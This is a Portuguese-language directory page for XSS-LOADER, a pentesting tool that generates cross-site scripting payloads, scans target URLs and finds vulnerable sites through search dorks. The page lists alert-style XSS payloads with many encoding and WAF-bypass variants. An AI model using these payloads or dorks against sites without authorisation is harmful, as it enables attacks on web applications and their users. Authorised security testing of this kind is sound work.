Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
XSS-LOADER — Gerador de Payload XSS ~ Scanner XSS ~ Localizador de Dorks XSS | Kitploit
Ferramentas/GitHubGitHub/capture0x/xss-loader
Scanners de Vulnerabilidades WebGeração de PayloadsExploração de Aplicações WebBypass de WAFTestes de Penetração
GitHubcapture0x/xss-loader

XSS-LOADER

Gerador de Payload XSS ~ Scanner XSS ~ Localizador de Dorks XSS

Ver Repositório
621123há 3 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

💎   FERRAMENTAS XSS-LOADER   💎

Escrito por TMRSWRR

Versão 1.0.0

Ferramentas all-in-one para GERADOR DE PAYLOAD XSS - SCANNER XSS - LOCALIZADOR DE DORKS XSS

Instagram: TMRSWRR

📷 Capturas de Tela 📷

👇 💌 Como usar 💌 👇

How to use

📒 Leia-me 📒

  • Esta ferramenta cria payload para uso em injeção XSS
  • Selecione as tags de payload padrão a partir do parâmetro ou escreva seu payload
  • Realiza injeção XSS com o parâmetro Xss Scanner
  • Encontra URLs de sites vulneráveis com o parâmetro Xss Dork Finder

💿 Instalação 💿

Instalação com requirements.txt

root@kitploit:~
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Uso

root@kitploit:~
python3 payloader.py

🗃️ Funcionalidades 🗃️

*Payload Básico

Define o parâmetro padrão como :<script>alert(1)</script>

*Payload Div

Define o parâmetro padrão como :<div onpointerover='alert(1)'>MOVE HERE</div

*Payload Img

Define o parâmetro padrão como :``````

*Payload Body

Define o parâmetro padrão como :<body ontouchstart=alert(1)>

*Payload Svg

Define o parâmetro padrão como :<svg onload=alert('1')>

*Digite Seu Payload

Codifica o payload escrito pelo usuário

*Parâmetro do Gerador de Payload

Codifica o payload na tag selecionada

root@kitploit:~
* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL ENCODE ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML ENTITY ENCODE----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  SPLIT PAYLOAD ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX ENCODE ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 ENCODE -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 ENCODE----->  Encode payload to utf-32 format.          
* |   9.  DELETE TAG -----> ";alert('XSS');//            
* |  10.  UNICODE ENCODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII ENCODE ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 ENCODE ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 ENCODE ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  PARENTHESIS BYPASS ----->  <script>alert`1`</script>   
* |  15.  UTF-8 ENCODE ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* |  19.  INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* |  20.  MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  MALFORMED IMG-----> <script>alert(1)</script>">
* |  22.  SPACE BYPASS-----> 
* |  23.  DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* |  25.  CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* |  26.  POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* |  27.  ALERT PAYLOADS-----> Show Alert Payload List
* |  28.  ALL CREATE PAYLOAD-----> Show Create All Payloads
* |  29.  GO BACK MAIN MENU
* |  30.  EXIT

*Scanner XSS

Inicialmente, você precisará inserir a URL do alvo Por favor, insira a URL como neste exemplo ==> e.g., alvo -----> http://target.com/index.php?name= Selecionado para escanear a lista de payloads

  • LISTA DE PAYLOADS BÁSICOS ==> Lista de payloads consistindo em tag script
  • LISTA DE PAYLOADS DIV ==> Lista de payloads consistindo em tag div
  • LISTA DE PAYLOADS IMG ==> Lista de payloads consistindo em tag img
  • LISTA DE PAYLOADS BODY ==> Lista de payloads consistindo em tag body
  • LISTA DE PAYLOADS SVG ==> Lista de payloads consistindo em tag svg
  • LISTA DE PAYLOADS MISTA ==> Lista de payloads consistindo em todas as tags
  • INSERIR CAMINHO DO ARQUIVO ==> Lista de payloads determinada pelo usuário. Por favor, insira a URL como neste exemplo..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Os resultados serão adicionados em "vulnpayload.txt" após a varredura.

*Localizador de Dorks XSS

Primeiro, insira o dork para pesquisa: e.g---->inurl:"search.php?q=" Os resultados serão salvos em "dork.txt" após a varredura.

Problemas Conhecidos

Corrigidos:

  • Erros de Unicode

  • Erros de módulo

Importante:

Se você quiser usar a ferramenta para python3 instalado no Windows, baixe o link abaixo:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

Bugs e Melhorias

Para relatos de bugs ou melhorias, por favor abra uma issue aqui.

Copyright 2020

Baixar ferramenta